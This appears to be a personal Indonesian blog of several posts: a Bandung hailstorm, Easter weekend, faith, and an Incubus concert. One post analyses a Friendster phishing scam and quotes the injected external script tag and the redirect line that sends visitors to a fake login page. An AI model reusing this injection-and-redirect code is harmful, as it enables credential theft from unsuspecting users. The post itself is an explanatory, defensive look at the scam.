Hujan Es Bandung

Minggu 30 Maret 2008 terjadi hujan es yang lebat di Buah Batu Regency Bandung.
Kira-kira pukul 15.00 an..
Mana ujan es, badai, ga ada ojek hehe

1. Dikala hujan es menyertai pesta di Cinox Bandung.


2. Kawanan partisipan yang baru turun dari motor bersiap untuk masuk ke tempat acara.



3. Masuk langsung menuju menu tersaji.


4. Sedikit bincang-bincang, kongkow-kongkow mengenang masa-masa lalu.



5. Ikutan karaoke demi menjaga integritas dan mengembangkan talenta.


6. Sebelum pulang, tak lupa foto-foto demi menjaga eksistensi.

7. Agar perjalanan pulang lebih terasa nyaman dan tidak dipenuhi kegelisahan yang menggelora, kebutuhan perut perlu di maintenance.




Hehe... empet aja gw ngliat kambing pada dateng ke depan kantor gw..
Dateng rame-rame, ngerusak tanaman, bikin bau suasana, poop sembarangan..
bebaaaaaassssss!!

Hehehe iya sih gw tau mereka neduh. Emang parah banget men..
Hujan esnya tuh gede-gede.. disertai angin kencang pula..
Baru sekali ini deh gw ngliat langsung esnya.
Dulu sih pernah denger kabar doang hujan es yang di daerah MH. Thamrin & Sudirman jakarta.



Foto-foto gw yang lain bisa diliat di blognya rizky:
Dia juga udah bikin liputannya dengan perspektif yang lebih realistis (bukan dunia khayalan bego kaya yang gw tulis diatas) hehehehe

Masalah phising friendster lagi. Profil Novia dan testi Adit

Mungkin ada yang udah nelusurin juga
Kebetulan Ali, gw ama icha, sempet penasaran ama testi adit di profil novia,
karna kami bertiga termasuk dapet message novia.


Mungkin ada yang dapet juga, isi messagenya begini:

Hai kemana aja nih ?
Eh lo kenal ma Adit yang testi gw gak ?
Please liat testi gw bentar dong.
Makasih yaa.




Bingung gw, si Novia kaya sok ga kenal aja sama gw...
Ternyata bener, si Ali dan Icha juga dikirim message serupa




Trus hasilnya kira-kira gini:


Biar lebih enak, sebelum buka profilenya novia, javascript di browsernya di nonaktifin dulu.


Kalo dah kebuka, coba di view source, trus find dengan keyword "friendlisters"

Kira-kira lengkapnya begini:

<script src="http://www.friendlisters.com/fs/link.txt"></script>




Dengan kata lain, webpage profilnya novia itu mengEmbeed external file, dengan nama link.txt

Sekarang kita donlot link.txt itu.
Ternyata isinya:
parent.document.location = 'http://www.friendlisters.com/fs/friendster.html'
Dengan kata lain, javascript ini melakukan redirect page parent ke alamat login friendster itu. Coba aja buka:
http://www.friendlisters.com/fs/friendster.html
Nah, mungkin disinilah, orang yang iseng ini mengharapkan ada user yang memasukan username serta passwordnya.

Selanjutnya, mungkin dia login ke beberapa user terserbut,
kemudian mengganti passwordnya,
dan melakukan send email secara masal.
(mungkin)




Untuk kasus della & kiwil yang ga bisa login lagi gw gatau.
Mungkin beda ama yang profil novia

Coba deh, lo kirim message ke staf friendsternya untuk kasus login problem.
Trus lo minta aja mentracking aktifitas account FS lo beberapa waktu terakhir (terutama kapan ganti passwordnya)
Jangan lupa, ngirim emailnya dari email yang lo daftarin ke FS. Agar mereka percaya elo yang punya account aslinya.
Mungkin ini ulah orang kurang kerjaan, atau mungkin juga friendsternya lagi ga beres.

mungkin.....
mangga kalo ada yang mau ngelanjutin

Good life

Gw seneng banget bisa memanfaatkan week-end paskah ini dengan senang. Libur paskah tahun ini dimulai dari Kamis, sehingga tri hari suci bagi umat Katolik bisa gw rayain dengan libur semuanya (Kamis Putih, Jumat Agung, Sabtu Suci - Minggu Paskah). 

Kamis kemarin gw mulai refreshing dengan jalan bareng dendie nyari gadget case, (secara jomblo gitu loh). Gadget case ini bentuknya tuh tas-tas kecil yang biasanya diselempangin atau diiket di pinggang gitu... Si dendie bilangnya tas-tas ariel piterpen kekekekeke tau kan lo.. yang merk-merk eiger / bodypack gitu heleh hehehe. Abis dari situ langsung menuju BKR, beli DVD nyari-nyari dan bingung akhirnya gw ngambil The Eye versi Jesica Alba yang cute abis dan SAW IV berharap gambarnya udah original. Sampe rumah karna udah jam 15.00-an langsung gw mandi dulu trus ke gereja untuk misa kamis putih. Sampe rumah karna udah jam 15.00-an langsung gw mandi dulu trus ke gereja untuk misa kamis putih. 

Waktu misa Kamis Putih ketemu Febry, Angel, Dewi dan Yuli. Udah lama ga liat mereka. Duduklah gw sama Febry dan saling tukar pengalaman. Dalam waktu dekat si Febry setelah lama di dunia main-con telecomunication vendor mau ditarik ke Bakrie Telecom. Gw doain lancar Feb, semoga Tuhan boleh memberi kesempatan baik kepada lo dan selanjutnya elo bisa membahagiakan lingkunganlo.

Pulang, sampe rumah langsung napsu pengen liat darah-darah di SAW IV, tapi ternyataaaa...... gambarnya belum ori, sial. Nyesel gw.Udah 3x gw beli disana gitu mulu. Boong mulu tuh penjaganya. Pertama beli januari, wajar kan kalo ga ori, trus february gw beli lagi, ga ori lagi. Trus maret sekarang ini gw beli lagi masih gitu juga... teloooooo! Akhirnya gw nonton The Eye cute dulu hehehe. Setelah ditonton, alurnya sih mirip dengan versi asia, tapi kalah jauh seremnya dengan yang versi asia. Btw gara-gara gw nonton the eye asia, gw jadi ga begitu parno lho ama setan. Hehe gatau ya... lebih pede aja sih, perasaan takut setidaknya agak terminimalisir. Selanjutnya terpaksa gw nonton SAW. Ternyata SAW IV tetap konsisten dengan ke HARDCORE-annya... mantav!!!!!! Btw ada yang punya SAW IV versi ori ga? donlot dari mana gitu yang qualitynya HDTV hehehe. Puas gw dengan miris-mirisnya hiiiiyyyyuuuww.

Hari jumat sambil nuggu berangkat ke gereja jam 14.00 gw ceting, ketemu Rere ngobrol banyak, trus gw denger music2 untuk bisa nginspirasiin drum track gw buat lagu pileofpoo. Aduh, PR yang belum selesai nih buat gw, bikin Drum pattern untuk pathetic & angelia. Ga lama Deva nelpon ngobrol ngalur ngidul deh. Dia udah Yudisium dengan gelarr dokternya. selamet ya dev. Semoga banyak orang yang bisa terbantu dan semakin banyak orang sehat di negri ini.. caelaaah...

Setelah ngobrol ama deva, gw langsung mandi dan menuju gereja untuk misa Jumat Agung. Gw agak telat kali ini, sehingga gw dapet tempat duduk paling belakang. Tapi untungnya masih di dalem. Seperti biasa di Gereja "Hati Tak Bernoda Santa Perawan Maria", tiap jumat agung selalu divisualisasikan dengan theater. Hal ini menurut gw sungguh positif, orang jadi lebih meresapi dan ga bikin ngantuk hahaha. Bener lho, terdengar isak tangis di kesunyian gereja di sela-sela ketika theater tersebut memvisualisasikan Yesus harus didera oleh para serdadu. Cewe-cewe yang duduk di sebelah gw di gereja pada nangis semua. Setelah itu muncul paduan suara yang menyanyikan lagu begitu indaaahnya, merdunya, dengan nada-nada khidmat dan syahdu.... Saat itu gw merasakan bener2 gimana penderitaan Yesus dan berterima kasih atas semua karunia yang selalu Tuhan berikan hingga gw masih boleh berkarya di dunia ini. Masih diberi kesempatan untuk selalu dekat dengan-Nya.

Selesai dari Gereja ketemu Caesar, diajak makan bareng di soto kordon.. Wah ternyata ketemu Bernardo dan Rindu juga... good good silaturahmi sama ade ade KMK.

Sampai di rumah, langsung gw ke carefour bareng riano untuk nyari kunci cakram buat motor kantor, disana ternyata abis karna kemarin diskon. Yang ada malah beli korsi bagus tapi murah, yoi banget nih, terus beli celana renang hahaha giblik dah, ini nih yang paling gw ngeri kalo ke tempat belanjaan, yang tadinya ga pengen dibeli jadi dibeli.

Sampe rumah langsung packing drumstick, mp3player, headplug, canon eos350d. Menuju studio. Menggarap PR band gw yang pileofpoo. Agak susah ngisi drumnya untuk 2 lagu ini. Sampai studio gubrak-gubrak nyoba ngisi ternyata gw belum dapet feelnya.. Kayanya gw mesti denger Blink 182 dulu untuk angelia, dan untuk pathetic gw masih belum tau dapet influencenya dari mana. Euuughhh??!?!? kapan gw bisa dapet ide untuk ini?!?!?! Wew hari yang panjang dan melelahkan. Pulang langsung tidur.

Paginya gw sama dendie bangun dan berangkat berenang ke Sabuga. Saatnya me-merawani celana renang baru gw hehehehe. Sampe sabuga lumayan enak agak sepi. Pemanasan bentar trus langsung nyebur. Enak juga ni celana renang. Berenang di Sabuga itu enak. Ga pernah gw di tempat lain, apalagi jakarta merasakan tempat berenang seenak sabuga. Di Sabuga itu murah, harganya 7.000 pas libur/sabtu-minggu. Kedalaman kolamnya 2 meter. Suasana enak, tempat ganti relatif bersih, keran ga bermasalah, airnya kenceng, banyak ciwi2 indonesia yang enak dipandang, ukuran kolamnya olympic. Enak deh cuy! Very recomended. Baru kali ini gw bisa bolak balik ga istirahat 40 x 2 meter pake gaya dada / katak. Kalo ditanya cape ato ngga, gw jawab ngga. Kalo elo cape, pasti cara berenangnya salah. Cewe aja bisa bolak balik 4x ga istirahat. Gimana caranya biar ga cape? Ternyata elo harus berenang se-relax mungkin, bergerak seminimal mungkin dan manfaatkan ayunan dari airnya untuk bergerak kedepan. Dari dulu gw berenang, ternyata baru kemarin ngerasain tricknya berenang yang santai. Pantes anak kecil aja bisa sampe 2 x 100 meter. Asik deh men... jadi pengen lagi minggu depan.

Balik dari berenang mampir dulu ke ITB expo 2008. Acara taunan yang memamerkaninformasi himpunan mahasiswa jurusan.. Asik juga, gw sempet berinteraksi dengan para mahasiswa disana, mencoba berkomunikasi dengan mahasiswa dari berbagai jurusan disana, beberapa diantaranya adalah arsitektur, astronomi, mesin, elektro, fisika, informatika, perminyakan, geodesi, tambang, matematika, planalogi, kimia, seni kriya... wew asik asik karyanya. Suasana di kampus ITB sendiri pun juga sudah sangat nikmat, arsitektur bangunanya indah, tata letak tangga, rumput, area tempat duduk, bangunan, semua cukup indah dan menjadi tatanan outdoor kampus yang apik. huhu jadi pengen kuliah disitu.

Pulangnya berencana ikut misa malam paskah hari sabtu suci. Tapi ternyata ga bisa gw hadiri, selain hari hujan, mata juga ga bakal kuat. Jadi gw putuskan ikut misa paskah minggu pagi aja. Sambil menunggu mata ketutup coba baca-baca buku pesenan yang gw beli dari mas Yusir Husni, mengenai SAP ABAP/4. Semoga langkah gw untuk nyemplung di dunia SAP ini merupakan jalan dari Tuhan. Tapi ini juga megang kulitnya belom sih :D. Setelah males mbaca bukunya hehehe, kebetulan bioskop transTV menghadirkan last samurai. Yaudah deh.. biar lebih maknyus meremnya, nyambi nonton.

Minggu pagi gw bangun, mandi, langsung menuju ke gereja untuk mengikuti misa minggu paskah. Semua berjalan lancar, misa ditutup dengan cewe cantik sebelah gw nyodorin tangannya untuk mengucapkan selamat paskah hehe, abis itu keluarganya ikutan. Ramah-ramah deh orang Bandung. Suka gw.

Cukup senang gw dengan semua pengalaman ini, gw cukup menikmati week end ini, gw merasa bersyukur kepada Tuhan karna sampai saat ini gw masih beroleh kesempatan hidup di tempat yang indah dan bahagia. Gw tinggal di Bandung, berprofesi sebagai doktor (mondok di kantor). Laundry ada, bisa tidur cukup, halaman ada, tempat untuk joging ada, tempat untuk main bola ada, makan cukup, tempat untuk menghirup udara bersih di pagi sampai pagi lagi juga ada (ga cuma pagi doang lho), keamanan terjamin, taneman ada, mata gw masih bisa ngeliat tumbuhan yang hijau-hijau, tempat parkir ada, balkon ada.

Mendapat pekerjaan yang halal, intensitas pekerjaan relatif bisa dimanage dengan fleksibel, pendapatan cukup, rekan kerja dan teman-teman punya tipikal yang baiiiiiik banget (jarang lho bisa dapet kondisi seperti ini), cocok lah gw dengan tipe lingkungan seperti ini. Selain itu gw masih punya waktu untuk belajar, jalan bareng temen di kota bandung yang mungil dan indah ini huhuuuy hahaha. Indaaaaah banget hidup inih...

Terima kasih Tuhan,
Terima kasih temen-temen,

Selamat Paskah.
Tuhan beserta kita

Percaya Tuhan

Kalo ide bisa dateng dari mana saja kan?
Kemarin gw nonton film ayat-ayat cinta. Ada satu scene dimana jagoannya dipenjara *caelah jagoan, si Fahri maksud gw* dan dia ga bisa nerima itu. Kemudian temannya yang juga dipenjara menceritakan tentang Nabi Yusuf yang juga difitnah dan dipenjara. Nabi Yusuf yang dimaksud adalah anak Yakub keturunan Abraham. Kalo agama lo agama yang berasal dari keturunan Abraham/Ibrahim pasti pernah denger. Inget ga? yaudah ni liat di wikipedia. Ada versi ini dan itu.

Nabi Yusuf diceritakan karna saking gantengnya, dia difitnah ama cewe trus masuk penjara. Sori nih bahasa gw agak ga resmi. Tapi yang penting gw pengen nyampein sesuatu biar lebih mudah dicerna. Lanjut lagi,.... Ada satu perkataan yang intinya bahwa Yusuf tetep nyantai difitnah dan dipenjara selama memang itulah yang terbaik buat dia yang datangnya dari Tuhan, selama jika memang itulah yang membuat Yusuf bisa lebih dekat dengan Tuhan. Yoi mantep kan??

Contoh lain yang juga gampang yaitu Yesus. Dalam ajaran Kristen, Yesus rela menderita dan banyak melakukan hal ekstrim selama hidupnya. Yang paling terkenal dalam sejarah kehidupan di bumi, hanya Yesus yang banyak melakukan mujizat. Hingga akhirnya dalam sejarah  umat kristiani, ia dipercaya menderita karena difitnah didera dan disalib hingga mati. Yesus setia kepada Allah dan melakukan segala sesuatu yang telah digariskan pada-Nya menurut perkataan Allah.

Wah berat bo kalo udah ngomongin ginian. karena sejarah sih, udah gitu menyangkut spiritual, yang ada jadinya persepsi beda-beda. Jadi balik ke keyakinan masing-masing yah... maap kalo ada salah kata.

Kalo dari sudut pandang keyakinan agama, kita sangat dianjurkan tentunya untuk percaya kepada Allah. Apapun yang terjadi kepada dirimu, merupakan anugrah dari Allah yang harus kita jalani dengan ikhlas sebagai perutusan kita di dunia ini. 

Tiap orang punya perutusannya masing-masing. Apakah dia harus membantu orang tak mampu, apakah dia harus menjadi presiden, apakah dia harus menjadi pemuka agama, apakah dia harus menjadi engineer telekomunikasi, apakah dia harus menjadi pemain harpa, apakah dia harus dekat dengan wanita beralis tebal, cerewet, ga ngerokok, bertato, supel dan jago berantem, apakah dia harus naik motor ke warteg. Semua adalah perutusan Tuhan.

Semua ini hanya hal-hal duniawi. Kita percaya adanya surga, sebagai tempat kita nantinya jika kita telah selesai menjalani kehidupan duniawi.

Nonton Konser Incubus

Hehe akhirnya Rabu 5 Maret 2008 jadi juga gw nonton Incubus. Setelah sekitar seminggu lalu kami beli tiket incubus festival, akhirnya hari ini tu tiket bisa digunain. Tadinya yang berangkat thomas, bertus, kiko, yogi dan Kiki. Tapi beg*nya Yogi harus ke Semarang karena telkomselnya dan Kiki harus kemana entah tak tau aku.. tinggal ber 3 deh. Kemudian karena ada 2 tiket nganggur, gw ajak Iping dan Dipa. Tapi ternyata Iping terkena rajasinga secara mendadak kekekeke ngga deng, dan Dipa harus ke Bali untuk merayakan nyepi, kemudian diganti oleh Ridwan dan Iwan.. *heleh namanya mirip*. Berhubung Iwan sibuk dengan sinarmasnya, yang bisa dateng hanya Ridwan.

Pukul 18.00 kita bertiga dah sampe venue yang bertepat di Tennis Indoor Senayan Jakarta, masuk gerbang dan mencoba nyari isi perut dulu, sambil ngejualin 1 tiket sisa ini. Yang paling males adalah saat dimana gw harus nitipin pocket camera gw.... NG*H*!!! Alhasil cuma mengandalkan kamera ponsel dah.

Pukul 19.55 kami segera masuk hall dan mencari posisi, saat itu kebetulan dapet di tengah yang ga terlalu ke kanan ato ke kiri dan ga terlalu ke depan atau belakang *ya iyelah.. kan tengah tadi gw bilang*. Menunggu dan menunggu ternyata incubus baru keluar panggung sekitar pukul 20.40an.

Saat lampu sudah gelap, incubus tanpa basa basi langsung memulai dengan Quicksand. Ooo My God... cocok banget ni lagu untuk intro... Abis itu langsung digeber A kiss to send us off YOIIIII BANGETTT!!!!! ni lagu emang cucok kali untuk dimainin di awal-awal... soundnya asik banget!

Waaaahhh sing along semua orang... Suara Brandon sampe ga kedengeran dari tempat gw berdiri. Yang kedengeran cuma musik dari suara orang-orang yang ikut nyanyi di sekeliling gw. Dan termasuk gw yang tereak tereak ampe orang depan gw tutup kuping kekekekekekekeke.
Nah ini songlistnya:

Pas intro nice to know you dimainin... gw langsung dengan pedenya teriak WAAAAAAAAAAAAAAAAAAAAAAAA !!!!!!!! Lo pernah kan merhatiin cewe2 yang teriak histeris gara-gara ngliat Brian Westlife atau Nick Carter BackstreetBoyz keluar dari blakang panggung misalnya? Nah gw teriak histeris kaya gitu kekekeke. Kadang ada yang dengan ketus bilang "ich sampe segitunya, biasa aja dong!!" Kekekeke berarti tu orang belom ngerasaan kegembiraan duniawi hahahahaha, kasian hidupnya sedih mulu kali kekekeke... lah ngelantur.

Selama nice to know you karna udah lama ga bawain lagu ini gw rada terbata-bata ngeja lyricnya. Suer ni lagu bagus banget.. keren banget!!!! Sound cosmic dari gitarnya si Mike bener-bener waaaaaaaa ... Nyanyi sekenceng-kencengnya gw pas di lagu ini bodo amat!
Gw paling demen banget di bagian yang:
Could it be that it had been there all along

I haven’t felt the way, I feel today
In so long it’s hard for me to specify
I’m beginning to notice
How much this feels like a waking limb
Pins and needles, nice to know you

Ga nyangka wish you were here dibawain agak-agak diawal. Selanjutnya langsung digeber Anna Molly, lagu baru mereka yang juga hits!! damn!!!!!! mantep banget alur lagunya...
Yang gw ga nyangka lagi, mereka bawain VITAMIN! yoiiiiiiiii!!! Lagu keren, klimaks, dan ada ngejamnya. KEREN! waaaah semakin SEREK aja suara gw gara-gara triak-triak nonstop nyanyi bareng brandon dan penonton yang lain dari awal.... Selesai Vitamin, dilanjut Favourite Things... damn!!! Loncat-loncat gw ga sempet istirahat siaaal.... cape banget gw...
Lagu selanjutnya untung The Warmth & drive, cukup membuat dingin suasana. ngaso-ngaso dulu. Tapi pas drive teteuup... nyanyiii jugaaa ... yang KERAAAASS.
 
Ada saat si Brandon megang gitar dan terdengar suara-suara efek gitar dan turntable, waaaaahhh gw langsung nebak... "PISTOLA" langsung aye dan segenap umat di negri ini treeeakkkk lageee.... nyanyi lageeee.. loncat loncat lagi.. Ga sengaja gw loncat sambil megang pundak orang depan gw kekekekeke, die jadi ga bisa loncat...  Hehehe udah gw triak-triak, megangin pundak... ga tau deh pas gw nyanyi ada ujan lokal ga, gara-gara mulut gw muncrat kekekeke ga sopan. Maaf ya dek... 

Talk shows on mute, waaaah ini lagu incubus yang paling ngeresep di hati gw... sampe rada-rada berlinangan air mata gw nyanyiin lagu ini. Ga kebayang Incubus bisa dateng ke Indonesia, bisa nyanyi bareng Incubus.. melihat Brandon BoydMike EinzigerJose PasillasChris KilmoreBen Kenney secara langsung di depan mata gw!!!
Sick sad little world biasa.... ada improvisasi ngejam di tengah lagu 

Megalomaniac, semua penonton menggila!

Kemudian mereka sempet ke belakang panggung dulu, dan seperti biasa kita melakukan "we want more" ya iyalaah .. kayanya tuh cuma baru sebentar... sejam laah...
mana puas??!?!?!?!

Mungkin mereka istirahat dulu sebentar, minum, bikin kopi, kalo ada yang kebelet ya boker dulu, ato ngabisin sebatang dua batang rokok dulu..

Segera setelah itu, sekali lagi sound cosmic keluar...
STELLAR!!!! wuaaaaaaaaaaa rameee lageeeeee... gilaaaa
tambah serek aje suara gw!!... hampir abis.

Lagu berikutnya, hehehe orang-orang sekitar gw sempet bingung, ni lagu apa.. Tapi gw langsung semangat abis loncat-loncat sendiri karena gw udah tau ini lagu CIRCLE!!! gelaaaaaa. Otomatis tereaaaak lageeeeee.. tambah abis aja suara gw.

Selanjutnya Aqueaus Transmission....
wew..... sehabis lagu ini... ternyata abis
gileeee anti klimaks banget kalo kata temen gw ridwan..
Penonton dibawa santai...
Fiewww... sebenernya gw sih kurang puasss
kayanya tuh cepet banget...
haduuuh...
Tapi seneng banget gw dengan datengnya incubus ke indonesia ini.
Salah satu mimpi nonton salah satu influence gw tercapai.
Selanjutnya menunggu:
  1. deftones
  2. STRIFE hehe ga mungkin kali yak
  3. Walls Of Jericho
  4. Hiromi Uehara (I missed her when she was coming at JJF 2006)
  5. mungkin As I lay Dying
No 1 sampe 4 is a MUST lah pokona!!

Ngeheeeeee pengen nyanyi bareng incubus lagi gw!!!
Ga pernah gw sebelumnya merasa segembira ini. Ampe terharu, apalagi pas nyanyiin Talk Shows On Mute heuuuuuuu~
Gilaaaa seneng banget gw...
Foto-foto yang sempet gw ambil, bisa diliat disini:

Kalo punya account di enjoyincubus, add gw ya
http://www.enjoyincubus.com/user/tomfreakz
Temen-temen di jakartaconcerts.com
Javamusikindo yang udah membuat incubus untuk hadir di Jakarta